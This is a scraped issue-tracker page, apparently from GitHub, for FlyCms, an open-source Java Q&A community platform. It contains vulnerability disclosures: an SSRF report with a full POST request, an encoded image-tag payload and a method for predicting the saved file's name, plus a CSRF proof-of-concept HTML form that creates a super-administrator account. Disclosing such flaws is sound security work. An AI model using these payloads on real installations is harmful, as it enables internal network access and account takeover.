FlyCms 是一个类似知乎以问答为基础的完全开源的JAVA语言开发的社交网络建站程序,基于 Spring Boot+Bootstrap3+MyBatis+MySql+Solr +Ehcache应用架构,专注于社区内容的整理、归类和检索,它集合了问答,digg,wiki 等多个程序的优点,帮助用户轻松搭建专业的知识库和在线问答社区。业务模块包括:权限管理,会员管理,角色管理,定时任务管理(调度管理),问答管理,文章管理,分享管理,短信接口管理和邮件系统发送(注册、找回密码、邮件订阅),跨域登录,消息推送,全文检索、前端国际化等等众多模块,等您自己来体验!
Home Page: http://www.28844.com
License: MIT License
后台添加管理员,数据库报错
数据库根本就对不上
接口:http://localhost/system/admin/admin_save
An issue was discovered in FlyCms. There is a security vulnerability in file /Users/bang/code/java/FlyCms-master/src/main/java/com/flycms/module/question/service/ImagesService.java, in saveUrlAs() function, result in a SSRF . SSRF Server Side Request Forgery attacks. The ability to create requests from the vulnerable server to intra/internet.
%3Cimg%20src%3D%22http%3A%2F%2F127.1%2Findex%22%2F%3E
Send the request is as follows:
POST /ucenter/question/add HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://localhost/question/add
Content-Length: 93
Cookie: CFID=3; CFTOKEN=50139797; ECS[visit_times]=1; bgC_sid=P5rfbe; JSESSIONID=node01jp6c3qjsftrz1xa81ovh47bff0.node0; Hm_lvt_2f24154b3f87697d36a4e2a638b68aaa=1560325064; Hm_lpvt_2f24154b3f87697d36a4e2a638b68aaa=1560328852; FlyCmsId=593f391df8a70cab630e34efa645c590
Connection: close
title=ssrf10&content=%3Cimg%20src%3D%22http%3A%2F%2F127.1%2Findex%22%2F%3E&tags=ssrf7&price=0
We can see that it will call replaceContent to fetch remote image when add a question.
In funtion replaceContent,we can use 127.1 bypass reg or request other url directly,and saveUrlAs is called here.
Finally HttpURLConnection result in SSRF.
Still in replaceContent, we can find the file path, file name.The addQuesion finally failed, but file will create.
File path is the date tody, example /upload/content/2019/6/12/
File name is concat md5(date + filenum) + filenum + extension
md5 16 result is 8-24 of md5_32 resulst.
And we can get server time from response, after convert timezone, we can caculate the result.
so filename is 43EC4555543DEFC6_0.,absolute path is /upload/content/2019/6/12/43EC4555543DEFC6_0.
Request the path we can download file named 43EC4555543DEFC6_0..
It's SSRF result.
The Add administrator Function is not check referer and token
PoC:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/system/admin/admin_save" method="POST">
<input type="hidden" name="adminName" value="Diazrael" />
<input type="hidden" name="password" value="123456" />
<input type="hidden" name="repassword" value="123456" />
<input type="hidden" name="nickName" value="Diazrael" />
<input type="hidden" name="roleId" value="272835742965968896" />
<input type="hidden" name="email" value="Diazrael@admin.com" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>Problematic code:
//处理和保存管理员信息
@PostMapping("/admin_save")
@ResponseBody
public DataVo addAdminSave(@Valid Admin admin, BindingResult result){
DataVo data = DataVo.failure("操作失败");
try {
if (result.hasErrors()) {
List<ObjectError> list = result.getAllErrors();
for (ObjectError error : list) {
return DataVo.failure(error.getDefaultMessage());
}
return null;
}
data = adminService.addAdmin(admin);
} catch (Exception e) {
data = DataVo.failure(e.getMessage());
}
return data;
}A super administrator account has been added successfully
很多低级的bug。
The Add administrator Function is not check referer and token
PoC:
`
Problematic code:
//处理和保存管理员信息 @PostMapping("/admin_save") @ResponseBody public DataVo addAdminSave(@Valid Admin admin, BindingResult result){ DataVo data = DataVo.failure("操作失败"); try { if (result.hasErrors()) { List<ObjectError> list = result.getAllErrors(); for (ObjectError error : list) { return DataVo.failure(error.getDefaultMessage()); } return null; } data = adminService.addAdmin(admin); } catch (Exception e) { data = DataVo.failure(e.getMessage()); } return data; }
Add a user with super privileges.
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
Django
The Web framework for perfectionists with deadlines.
Laravel
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
Microsoft
Open source projects and samples from Microsoft.
Google
Google ❤️ Open Source for everyone.
Alibaba
Alibaba Open Source for everyone
D3
Data-Driven Documents codes.
Tencent
China tencent open source team.